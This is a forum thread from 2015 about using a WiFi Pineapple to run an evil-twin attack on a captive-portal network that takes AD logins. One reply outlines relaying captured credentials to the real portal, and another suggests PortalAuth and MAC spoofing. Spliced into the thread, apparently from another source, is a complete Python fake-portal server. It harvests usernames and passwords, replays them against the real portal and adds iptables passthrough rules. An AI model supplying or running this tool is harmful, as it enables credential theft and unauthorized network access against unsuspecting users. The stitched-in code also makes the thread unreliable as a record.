nopenoway Posted May 29, 2015

Hi All,

Proud new owner of a Pineapple Mk V here but fairly new user. I'm trying to test a network which is 'Open' and redirects any connected users to a captive portal (requiring AD logins). I'm wondering if it would be possible to perform an attack that does the following:

wlan0 broadcasts 'TARGET_SSID' as Open with the same spoofed MAC address/ESSID etc.
wlan1 connects to the 'legitimate' 'TARGET_SSID' and connects to the captive portal page.
When a user connects to the fake TARGET_SSID on wlan0 they should see an SSL-stripped version of the captive portal.
Ideally, once they log in, the login should pass through wlan1 to get internet/network access.
If that's occurred successfully, the user should be allowed to browse as per usual while having an SSL-stripping attack performed.

I'm not sure how to tie all these attacks together; from what I've been able to read so far, each of these attacks can happen, but they all happen individually. Could anyone point me in the direction of any guides etc. that will help me do this, or have any pointers?

Many thanks
digininja Posted May 29, 2015

Captive portals usually work by allowing the MAC of the authenticated user through so they can use all the network services, so the basic way you would do this attack would be:

wlan0 puts up a fake AP with a fake login page. Don't pass through and don't sslstrip, just put up the page and ask for creds.
wlan1 associates with the real AP.
When a user sends creds to your fake portal it takes those and repeats the form POST (that is the most common auth method) against the real login page.
If the login is successful the MAC of wlan1 is then approved for use on the network.
Once you detect this success you take down the fake captive portal page and allow traffic to flow freely.

Automating this shouldn't be too hard if you can do a bit of coding.
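The credential-relay flow described in the post above, as an added example that is not code from the thread, from PortalAuth or from the Pineapple firmware. It assumes a portal that accepts a plain form POST with `username`/`password` fields at `http://10.0.0.1/login`, that a wrong password re-renders a form named `login`, that the fake portal listens on 172.16.42.1:8080 and was reached through a port-80 DNAT rule on wlan0; all of these are placeholders to replace after inspecting the real portal. The transport is injectable so the relay logic can be exercised without a network.

```python
"""Credential-relay skeleton: fake portal on wlan0, replay each login against the real portal via wlan1."""
import re
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumptions (not from the thread): inspect the real portal first and replace these.
REAL_PORTAL_URL = "http://10.0.0.1/login"         # real portal login endpoint, reached via wlan1
FORM_FIELDS = ("username", "password")             # input names of the portal's login form
FAKE_PORTAL_BIND = ("172.16.42.1", 8080)           # where the fake portal listens on wlan0
LANDING_URL = "http://example.com/"                # where a successful login is bounced to
LOGIN_FORM_RE = re.compile(r'<form[^>]*\bname=["\']login["\']', re.I)  # "still at the login page" marker

FAKE_LOGIN_PAGE = b"""<html><body><form name="login" method="POST" action="/login">
Username <input name="username"><br>Password <input name="password" type="password"><br>
<input type="submit" value="Log in"></form></body></html>"""


def parse_form_post(body: bytes) -> dict:
    """Pull the credential fields out of an application/x-www-form-urlencoded POST body."""
    fields = urllib.parse.parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {name: fields.get(name, [""])[0] for name in FORM_FIELDS}


def http_post(url: str, data: dict) -> tuple:
    """Default transport: a real form POST with urllib. Returns (status, body)."""
    req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(),
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def login_succeeded(status: int, html: str) -> bool:
    """Success heuristic: the portal answers 2xx/3xx and no longer serves its login form.
    A rejected password typically re-renders the form, so its presence means 'not through yet'."""
    return 200 <= status < 400 and LOGIN_FORM_RE.search(html) is None


def replay_login(creds: dict, post=http_post) -> bool:
    """Repeat the captured form POST against the real portal over wlan1 (step 3 of the post)."""
    status, html = post(REAL_PORTAL_URL, creds)
    return login_succeeded(status, html)


def passthrough_commands(lan="wlan0", wan="wlan1", bind=FAKE_PORTAL_BIND) -> list:
    """iptables commands for step 5: stop the port-80 hijack and NAT the fake AP's clients out via wlan1,
    so they ride on wlan1's now-approved MAC. Returned as strings for review; run them with subprocess.
    The DNAT rule deleted here is assumed to be the one that sent clients to the fake portal."""
    dnat = "-i %s -p tcp --dport 80 -j DNAT --to-destination %s:%d" % (lan, bind[0], bind[1])
    return [
        "iptables -t nat -D PREROUTING " + dnat,
        "iptables -t nat -A POSTROUTING -o %s -j MASQUERADE" % wan,
        "iptables -A FORWARD -i %s -o %s -j ACCEPT" % (lan, wan),
        "iptables -A FORWARD -i %s -o %s -m state --state ESTABLISHED,RELATED -j ACCEPT" % (wan, lan),
    ]


class RelayState:
    """Shared across handler instances: captured credentials and whether one relay has succeeded."""
    authenticated = False
    captured = []
    post = staticmethod(http_post)   # swappable transport so the relay can be exercised offline


def handle_submission(body: bytes, state=RelayState) -> bool:
    """Process one POST to the fake portal: record the creds, relay them, flip state on success."""
    creds = parse_form_post(body)
    state.captured.append(creds)
    if replay_login(creds, state.post):
        state.authenticated = True
    return state.authenticated


class FakePortalHandler(BaseHTTPRequestHandler):
    """Serves the cloned login page on wlan0 and relays each submission."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(FAKE_LOGIN_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        if handle_submission(self.rfile.read(length)):
            # Mimic the real portal's post-login bounce; the operator now applies passthrough_commands().
            self.send_response(302)
            self.send_header("Location", LANDING_URL)
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(FAKE_LOGIN_PAGE)   # wrong creds: show the form again, as the real portal would


if __name__ == "__main__":
    HTTPServer(FAKE_PORTAL_BIND, FakePortalHandler).serve_forever()
```

The success check is deliberately a heuristic; a real portal may answer a good login with a 200 and a "you are now connected" page rather than a redirect, so adjust `login_succeeded` to whatever the target actually returns, and test it against a known-good login before relying on it to decide when to drop the fake page.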
sud0nick Posted May 29, 2015

May I suggest using PortalAuth to try cloning the portal? It will also use nmap to grab the MAC addresses of all other clients on the network if auto-authentication fails, so you can spoof your MAC.